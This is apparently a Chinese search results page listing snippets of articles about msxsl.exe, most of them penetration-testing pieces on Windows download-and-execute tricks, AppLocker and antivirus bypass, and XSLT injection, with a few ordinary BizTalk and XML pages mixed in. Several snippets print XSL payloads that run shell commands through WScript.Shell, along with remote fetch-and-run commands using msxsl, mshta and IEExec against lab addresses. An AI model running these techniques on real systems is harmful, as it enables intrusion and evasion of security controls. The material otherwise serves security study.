首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏渗透测试教程

    windows命令执行防御规避总结

    CPIApplet.dll 传入windows机器,然后重命名为CPIApplet.cpl,通过control.exe c:\users\administrator\desktop\CPIApplet.cpl 执行命令 通过msxsl.exe > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com :xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix new ActiveXObject("WScript.Shell").Run("cmd.exe /k calc.exe"); return nodelist.nextNode().xml; } </msxsl select="user:xml(.)"/> </xsl:template> </xsl:stylesheet> 开启http服务 python3 -m http.server 80 远程下载执行 msxsl.exe

    1K20发布于 2021-11-12
  • 来自专栏Bypass

    Windows文件下载执行的15种姿势

    14、MSXSL.EXE msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。 id=21714 msxsl.exe 需要接受两个文件,XML及XSL文件,可以远程加载,具体方式如下: msxsl http://192.168.28.128/scripts/demo.xml http > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com :xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); return nodelist.nextNode().xml; } </msxsl

    4.6K11发布于 2020-04-26
  • 来自专栏Bypass

    通过命令下载执行恶意代码的几种姿势

    IEExec.exe http://192.168.28.131/evil.exe 09、mshta mshta用于执行.hta文件 mshta http://192.168.28.128/run.hta 10、msxsl msxsl.exe是微软用于命令行下处理XSL的一个程序 msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts

    2.6K20发布于 2020-08-27
  • 来自专栏FreeBuf

    如何使用RTA框架测试安全团队的威胁行为检测能力

    Suite user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py Microsoft MsXsl msxsl_network.py Microsoft 工具安装 首先,广大研究人员需要使用下列命令将该项目源码克隆至本地: git clone https://github.com/endgameinc

    70510编辑于 2023-08-08
  • 来自专栏DevOps

    DevOpt:WMIC命令使用技巧

    > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl ="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script new ActiveXObject("WScript.Shell").Run("shell.exe"); return nodelist.nextNode().xml; } </msxsl

    41010编辑于 2024-03-29
  • 来自专栏黑白天安全团队

    常见的windows下无文件落地攻击手法

    理论上是可以的哈哈哈哈 利用certUtil简便快捷,但是使用后需要注意清除缓存 5.msxsl.exe利用 这个是winddows发布的一个组件但是它并没有安装在windows操作系统中,那么为什么要利用它 msxsl.exe具有windows的签名,它的大小也只有24.3 KB (24,896 字节),我们完全可以上传到目标中或者在钓鱼文档中释放加载来进行利用来绕过杀毒软件的检测查杀。 ? ? id=21714 我们可以在网络上公开的资料可以知道: msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令 执行该工具需要用到2个文件 ,分别为XML及XSL文件,其命令如下: msxsl.exe test.xml exec.xsl 利用手法: test.xml的代码模板: <? :xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix

    7.5K21发布于 2021-03-16
  • WMIC命令的利用技巧

    > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl ="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script new ActiveXObject("WScript.Shell").Run("shell.exe"); return nodelist.nextNode().xml; } </msxsl

    1K30编辑于 2022-12-28
  • 来自专栏Ms08067安全实验室

    收集整理的23种文件下载的方式

    http://site.com/payloads/calc.png calc.png msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png msxsl.exe (需下载) eg: msxsl https://evi1cg.github.io/scripts/demo.xml https://evi1cg.github.io/scripts/exec.xsl > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com :xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); return nodelist.nextNode().xml; } </msxsl

    2.5K30发布于 2020-01-02
  • 来自专栏c#开发者

    BizTalk 开发小技巧-Custom XSLT复杂mapping的简单实现

    > <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com :xslt" xmlns:var="http://schemas.microsoft.com/BizTalk/2003/var" exclude-result-prefixes="msxsl var s0

    2.4K70发布于 2018-04-12
  • 来自专栏中国白客联盟

    Hacking with Style, Stylesheets

    我们看下他的xsl文件格式,发现跟xml格式一样,而且跟之前msxsl的bypass很像。

    1K20发布于 2018-07-26
  • 来自专栏全栈工程师修炼之路

    Win下终端实现文件上传和下载执行

    urlopen('http://site.com/abc').read();" import base64; exec base64.b64decode("aW1wb=") WeiyiGeek. 4)msxsl.exe msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xs demo.xml: <? > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com --关键点--> <msxsl:script language="JScript" implements-prefix="user"> function xml(nodelist) { new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); return nodelist.nextNode().xml; } </msxsl

    2.2K10编辑于 2022-09-29
  • 来自专栏全栈工程师修炼之路

    Win下终端实现文件上传和下载执行

    WeiyiGeek. 4)msxsl.exe msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xs demo.xml > <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com --关键点--> <msxsl:script language="JScript" implements-prefix="user"> function xml(nodelist) { new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); return nodelist.nextNode().xml; } </msxsl

    3.8K10发布于 2020-10-23
  • 来自专栏逢魔安全实验室

    渗透技巧 | Windows上传并执行恶意代码的N种姿势

    p=555 MSXSL 根据Microsoft的msxsl.exe命令行程序,用户能够使用Microsoft XSL处理器执行命令行可扩展样式表语言(XSL)。 msxsl.exe customers.xml script.xsl Links: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl

    4.4K51发布于 2018-03-29
  • 来自专栏重生信息安全

    BC实战|后渗透之Bypass Applocker到提权

    fr=aladdin 然后就找到3g师傅的一篇文章: https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker

    1.4K10发布于 2020-03-06
  • 来自专栏Urahara Blog

    Windows上传并执行恶意代码的N种姿势

    p=555 MSXSL 根据Microsoft的msxsl.exe命令行程序,用户能够使用Microsoft XSL处理器执行命令行可扩展样式表语言(XSL)。 msxsl.exe customers.xml script.xsl Links: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl

    6.1K31发布于 2018-06-01
  • 来自专栏入门小站

    Linux+Windows命令行终端下载指令大全

    \TexttoExe.ps1 evil.text evil.exe 3.15 其它 1.MSXSL.EXE msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript

    3.2K20编辑于 2022-06-02
  • 来自专栏分布式系统和大数据处理

    从一个范例看XML的应用

    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl ="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl"> <xsl:output <xsl:element name="td"> <xsl:value-of select="<em>msxsl</em>

    4.1K40发布于 2018-09-30
  • 来自专栏有价值炮灰

    XML 相关漏洞风险研究

    From @IOActive: Abusing XSLT for Practical Attacks White Paper 如果显示的是 Microsoft XSLT 解释器,那么可以尝试通过 msxsl 标签来执行 C# 代码: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl ="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App"> <msxsl:script implements-prefix [CDATA[ { System.Diagnostics.Process.Start("cmd.exe /C calc.exe"); } ]]> </msxsl:script "/"> </xsl:template> </xsl:stylesheet> 不过这通常需要设置 XsltSettings.EnableScript,参考 Script Blocks Using msxsl

    2.8K10编辑于 2024-06-03
领券